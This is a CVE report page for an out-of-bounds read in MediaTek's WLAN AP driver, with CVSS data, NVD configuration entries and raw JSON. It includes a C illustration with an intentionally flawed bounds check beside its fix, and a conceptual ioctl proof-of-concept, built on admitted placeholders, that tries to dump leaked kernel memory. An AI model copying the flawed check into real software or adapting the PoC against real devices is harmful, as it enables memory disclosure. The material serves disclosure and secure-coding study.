Security Vulnerability Report
CVE-2025-20724 CVSS 5.5 MEDIUM

CVE-2025-20724

Published: 2025-10-14 10:15:37
Last Modified: 2025-10-16 13:04:11

Description

In wlan AP driver, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00418894; Issue ID: MSV-3475.
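The advisory does not say what the "incorrect bounds check" looks like, and the driver source is not on this page. As an added illustration (editor's code, not MediaTek's and not derived from the patch), the C below shows the shape such a bug usually takes in an ioctl-style handler: a request carrying a caller-controlled offset and length, a check that validates each field on its own but never their sum, and the hardened form that compares the length against the remaining room so the arithmetic cannot wrap. The struct names, sizes, buffer layout and the "private tail" placed after the buffer are all hypothetical; the fill data is constructed inline so the leak is observable without any hardware.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical sizes and layout; nothing here is taken from the MediaTek driver. */
#define BUF_SIZE  256u
#define TAIL_SIZE 16u

/* Caller-controlled request: which window of the exposed buffer to copy out.
   Stands in for the payload of an ioctl like the one the CVE describes. */
struct read_req {
    uint32_t offset;
    uint32_t len;
};

/* Driver-side memory. Bytes [0, BUF_SIZE) are the buffer a request may
   legitimately read; the TAIL_SIZE bytes after it stand in for adjacent
   private kernel data (what an OOB read leaks). One flat array keeps the
   pointer arithmetic well-defined so the leak can be observed safely. */
struct driver_state {
    uint8_t mem[BUF_SIZE + TAIL_SIZE];
};

typedef int (*window_handler)(const struct driver_state *, const struct read_req *,
                              uint8_t *, size_t);

/* Incorrect bounds check: offset and len are each validated against BUF_SIZE,
   but their sum is not, so offset=250,len=16 copies 10 bytes past the buffer.
   Returns bytes copied, or -1 if rejected. */
static int read_window_vulnerable(const struct driver_state *st, const struct read_req *rq,
                                  uint8_t *out, size_t out_cap)
{
    if (rq->offset >= BUF_SIZE || rq->len > BUF_SIZE || rq->len > out_cap)
        return -1;
    memcpy(out, st->mem + rq->offset, rq->len); /* OOB read when offset+len > BUF_SIZE */
    return (int)rq->len;
}

/* Also incorrect: a naive sum check in 32-bit arithmetic wraps, so a huge
   offset paired with a small len passes. Shown as a predicate only. */
static int sum_check_accepts(uint32_t offset, uint32_t len)
{
    return offset + len <= BUF_SIZE; /* 0xFFFFFFF0 + 0x20 wraps to 0x10 */
}

/* Hardened check: establish offset < BUF_SIZE first, then compare len against
   the remaining room. The subtraction cannot wrap, so offset+len <= BUF_SIZE
   is enforced without ever computing the sum. */
static int read_window_fixed(const struct driver_state *st, const struct read_req *rq,
                             uint8_t *out, size_t out_cap)
{
    if (rq->offset >= BUF_SIZE)
        return -1;
    if (rq->len > BUF_SIZE - rq->offset)
        return -1;
    if (rq->len > out_cap)
        return -1;
    memcpy(out, st->mem + rq->offset, rq->len);
    return (int)rq->len;
}

/* Harness: fill the buffer with 'B' and the private tail with 'S' (constructed
   data), request the last 6 buffer bytes plus 10 more, and count how many 'S'
   bytes reached the caller. */
static int count_leaked_tail_bytes(window_handler handler)
{
    struct driver_state st;
    struct read_req rq = { .offset = BUF_SIZE - 6, .len = 16 };
    uint8_t out[64] = { 0 };
    int n, i, leaked = 0;

    memset(st.mem, 'B', BUF_SIZE);
    memset(st.mem + BUF_SIZE, 'S', TAIL_SIZE);

    n = handler(&st, &rq, out, sizeof out);
    if (n < 0)
        return 0; /* request rejected: nothing leaked */
    for (i = 0; i < n; i++)
        if (out[i] == 'S')
            leaked++;
    return leaked;
}

/* Sanity check for the hardened path: a request for the whole buffer
   (offset 0, len BUF_SIZE) must still be accepted. */
static int full_buffer_bytes_copied(window_handler handler)
{
    struct driver_state st;
    struct read_req rq = { .offset = 0, .len = BUF_SIZE };
    uint8_t out[BUF_SIZE];

    memset(st.mem, 'B', sizeof st.mem);
    return handler(&st, &rq, out, sizeof out);
}

int main(void)
{
    printf("vulnerable handler leaked %d private bytes\n",
           count_leaked_tail_bytes(read_window_vulnerable));
    printf("fixed handler leaked %d private bytes\n",
           count_leaked_tail_bytes(read_window_fixed));
    printf("naive sum check accepts offset=0xFFFFFFF0,len=0x20: %s\n",
           sum_check_accepts(0xFFFFFFF0u, 0x20u) ? "yes (wrap)" : "no");
    return 0;
}
```

The fixed handler rejects the same request the vulnerable one services, while still accepting a full-buffer read; the subtraction form is the idiom to reach for whenever a check would otherwise add two attacker-controlled integers.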

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

The NVD configuration data (see Raw JSON Data below) consists of two AND groups. In each group the hardware entries are marked NOT VULNERABLE because they are the platform half of the match, not because those chipsets are unaffected: the vulnerable component is the software running on them.

Configuration 1: MediaTek SDK, versions up to and including 7.6.7.2, on one of these chipsets
cpe:2.3:a:mediatek:software_development_kit:*:*:*:*:*:*:*:* - VULNERABLE (versionEndIncluding 7.6.7.2)
cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:h:mediatek:mt7615:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:h:mediatek:mt7622:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:h:mediatek:mt7663:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:h:mediatek:mt7915:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:h:mediatek:mt7916:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:h:mediatek:mt7981:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:h:mediatek:mt7986:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)

Configuration 2: OpenWrt 19.07.0 or 21.02.0 on MT6890
cpe:2.3:o:openwrt:openwrt:19.07.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:openwrt:openwrt:21.02.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)

Additional notes from this page (not part of the NVD data):
MediaTek WLAN AP Driver - all versions without the WCNCR00418894 patch applied
Android devices with MediaTek chipsets - affected scope must be confirmed per chip model
MediaTek MT-series chipsets (specific models pending confirmation in the official bulletin)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * CVE-2025-20724 - MediaTek WLAN AP Driver Out-of-Bounds Read PoC
 *
 * Conceptual PoC: demonstrates how an out-of-bounds read could be triggered
 * in the MediaTek WLAN AP driver through an incorrectly bounds-checked
 * offset field. Patch ID: WCNCR00418894; Issue ID: MSV-3475.
 *
 * Caveat: the device path, ioctl command number and request layout below are
 * placeholders. The advisory does not describe the driver's interface, so
 * these values must be replaced with the real ones for the target build.
 * Requires local user execution privileges on the target device.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>

/* Placeholder WLAN driver interface constants (not taken from the advisory) */
#define WLAN_AP_DRIVER_DEVICE "/dev/wlan_ap"
#define IOCTL_WLAN_AP_CMD     0x1001   /* Hypothetical IOCTL command */

/* Placeholder request structure modelling the vulnerable data buffer */
struct wlan_ap_request {
    unsigned int data_len;   /* Length of data buffer */
    unsigned int offset;     /* Read offset (the field the driver fails to bounds-check) */
    char data[256];          /* Data buffer */
};

int main(int argc, char *argv[])
{
    int fd;
    struct wlan_ap_request req;
    char leak_buffer[512];   /* Buffer to capture leaked data */
    ssize_t n;

    (void)argc;
    (void)argv;

    printf("[*] CVE-2025-20724 PoC - MediaTek WLAN AP Driver OOB Read\n");
    printf("[*] Patch ID: WCNCR00418894\n");
    printf("[*] Issue ID: MSV-3475\n\n");

    /* Open the WLAN AP driver device */
    fd = open(WLAN_AP_DRIVER_DEVICE, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open WLAN AP driver device");
        printf("[*] This PoC requires access to the MediaTek WLAN AP driver interface.\n");
        return 1;
    }
    printf("[+] Opened WLAN AP driver device (fd=%d)\n", fd);

    /*
     * Prepare the crafted request. The bug is triggered by an offset that
     * exceeds the bounds of the internal data buffer; the vulnerable driver
     * fails to validate it against the buffer length.
     */
    memset(&req, 0, sizeof(req));
    req.data_len = 256;        /* Actual buffer size */
    req.offset   = 0xFFFF;     /* Out-of-bounds offset (not properly checked) */
    memset(req.data, 'A', sizeof(req.data));

    printf("[*] Sending crafted request with OOB offset: 0x%X\n", req.offset);

    /* Send the IOCTL request; the driver reads beyond the allocated buffer
       because of the incorrect bounds check on the offset field. */
    if (ioctl(fd, IOCTL_WLAN_AP_CMD, &req) < 0) {
        perror("[-] IOCTL call failed");
    } else {
        printf("[+] IOCTL call succeeded - potential OOB read triggered\n");
    }

    /* Attempt to read back leaked data */
    printf("[*] Attempting to read leaked memory contents...\n");
    memset(leak_buffer, 0, sizeof(leak_buffer));
    n = read(fd, leak_buffer, sizeof(leak_buffer));
    if (n < 0) {
        perror("[-] read() failed");
        n = 0;
    }

    /* Hex dump of whatever came back (only the bytes actually returned) */
    printf("[*] Leaked data (%zd bytes, hex dump):\n", n);
    for (ssize_t i = 0; i < n; i++) {
        printf("%02X ", (unsigned char)leak_buffer[i]);
        if ((i + 1) % 16 == 0)
            printf("\n");
    }
    printf("\n");

    close(fd);
    printf("[*] PoC execution completed.\n");
    return 0;
}

References

https://corp.mediatek.com/product-security-bulletin/October-2025 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20724", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:37.350", "lastModified": "2025-10-16T13:04:10.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In wlan AP driver, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00418894; Issue ID: MSV-3475."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mediatek:software_development_kit:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.6.7.2", "matchCriteriaId": "0DD86CC1-BD46-42D2-9112-190CCAC96B30"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:*", "matchCriteriaId": "171D1C08-F055-44C0-913C-AA2B73AF5B72"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7615:-:*:*:*:*:*:*:*", "matchCriteriaId": "05748BB1-0D48-4097-932E-E8E2E574FD8D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7622:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EB4B27-6264-45BE-9A22-BE8418BB0C06"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7663:-:*:*:*:*:*:*:*", 
"matchCriteriaId": "10C79211-F064-499D-914E-0BACD038FBF4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7915:-:*:*:*:*:*:*:*", "matchCriteriaId": "3AB22996-9C22-4B6C-9E94-E4C055D16335"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7916:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD5AA441-5381-4179-89EB-1642120F72B4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7981:-:*:*:*:*:*:*:*", "matchCriteriaId": "490CD97B-021F-4350-AEE7-A2FA866D5889"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7986:-:*:*:*:*:*:*:*", "matchCriteriaId": "40A9E917-4B34-403F-B512-09EEBEA46811"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:19.07.0:-:*:*:*:*:*:*", "matchCriteriaId": "4FA469E2-9E63-4C9A-8EBA-10C8C870063A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:21.02.0:-:*:*:*:*:*:*", "matchCriteriaId": "F0133207-2EED-4625-854F-8DB7770D5BF7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:*", "matchCriteriaId": "171D1C08-F055-44C0-913C-AA2B73AF5B72"}]}]}], "references": [{"url": "https://corp.mediatek.com/product-security-bulletin/October-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}